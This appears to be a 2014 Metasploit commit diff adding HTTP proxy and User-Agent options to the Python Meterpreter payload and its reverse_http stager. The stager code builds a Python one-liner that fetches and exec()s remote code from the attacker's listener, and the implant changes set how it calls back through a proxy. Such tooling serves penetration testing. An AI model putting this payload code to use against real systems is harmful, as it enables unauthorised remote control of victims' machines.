Pymeterp http proxy and user agent support

zeroSteiner · zeroSteiner · commit 0bf93acf6be2 · 2014-11-16T14:29:20.000-05:00
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
@@ -19,7 +19,7 @@
 	has_windll = hasattr(ctypes, 'windll')
 
 try:
-	urllib_imports = ['build_opener', 'install_opener', 'urlopen']
+	urllib_imports = ['ProxyHandler', 'build_opener', 'install_opener', 'urlopen']
 	if sys.version_info[0] < 3:
 		urllib = __import__('urllib2', fromlist=urllib_imports)
 	else:
@@ -49,6 +49,7 @@
 HTTP_COMMUNICATION_TIMEOUT = 300
 HTTP_CONNECTION_URL = None
 HTTP_EXPIRATION_TIMEOUT = 604800
+HTTP_PROXY = None
 HTTP_USER_AGENT = None
 
 PACKET_TYPE_REQUEST        = 0
@@ -326,7 +327,11 @@ def __init__(self, socket=None):
 			self.running = True
 
 	def driver_init_http(self):
-		opener = urllib.build_opener()
+		if HTTP_PROXY:
+			proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
+			opener = urllib.build_opener(proxy_handler)
+		else:
+			opener = urllib.build_opener()
 		if HTTP_USER_AGENT:
 			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 		urllib.install_opener(opener)
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
@@ -211,6 +211,11 @@ def on_request(cli, req, obj)
         blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
         blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
+        unless datastore['PROXYHOST'].blank?
+          proxy_url = "http://#{datastore['PROXYHOST']}:#{datastore['PROXYPORT']}"
+          blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+        end
+
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session
diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb
@@ -45,7 +45,7 @@ def initialize(info = {})
         OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
         OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
         OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
- 			], Msf::Handler::ReverseHttpsProxy)
+      ], Msf::Handler::ReverseHttpsProxy)
 
     register_advanced_options(
       [
diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb
@@ -19,9 +19,14 @@ def initialize(info = {})
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseHttp,
-      'Convention'    => 'http',
       'Stager'        => {'Payload' => ""}
     ))
+
+    register_options(
+      [
+        OptString.new('PROXYHOST', [ false, "The address of an http proxy to use", "" ]),
+        OptInt.new('PROXYPORT',    [ false, "The Proxy port to connect to", 8080 ])
+      ], Msf::Handler::ReverseHttp)
   end
 
   #
@@ -30,6 +35,10 @@ def initialize(info = {})
   def generate
     lhost = datastore['LHOST'] || Rex::Socket.source_address
 
+    var_escape = lambda { |txt|
+      txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
+    }
+
     target_url  = 'http://'
     target_url << lhost
     target_url << ':'
@@ -38,7 +47,16 @@ def generate
     target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
 
     cmd  = "import sys\n"
-    cmd << "exec(__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=['urlopen']).urlopen('#{target_url}').read())\n"
+    if datastore['PROXYHOST'].blank?
+      cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener'])\n"
+      cmd << "opener=ul.build_opener()\n"
+    else
+      proxy_url = "http://#{datastore['PROXYHOST']}:#{datastore['PROXYPORT']}"
+      cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
+      cmd << "opener=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
+    end
+    cmd << "opener.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
+    cmd << "exec(opener.open('#{target_url}').read())\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     b64_stub  = "import base64,sys;exec(base64.b64decode("

Original file line number	Diff line number	Diff line change
`@@ -45,7 +45,7 @@ def initialize(info = {})`
`45`	`45`	`OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),`
`46`	`46`	`OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),`
`47`	`47`	`OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])`
`48`		`- ], Msf::Handler::ReverseHttpsProxy)`
	`48`	`+ ], Msf::Handler::ReverseHttpsProxy)`
`49`	`49`
`50`	`50`	`register_advanced_options(`
`51`	`51`	`[`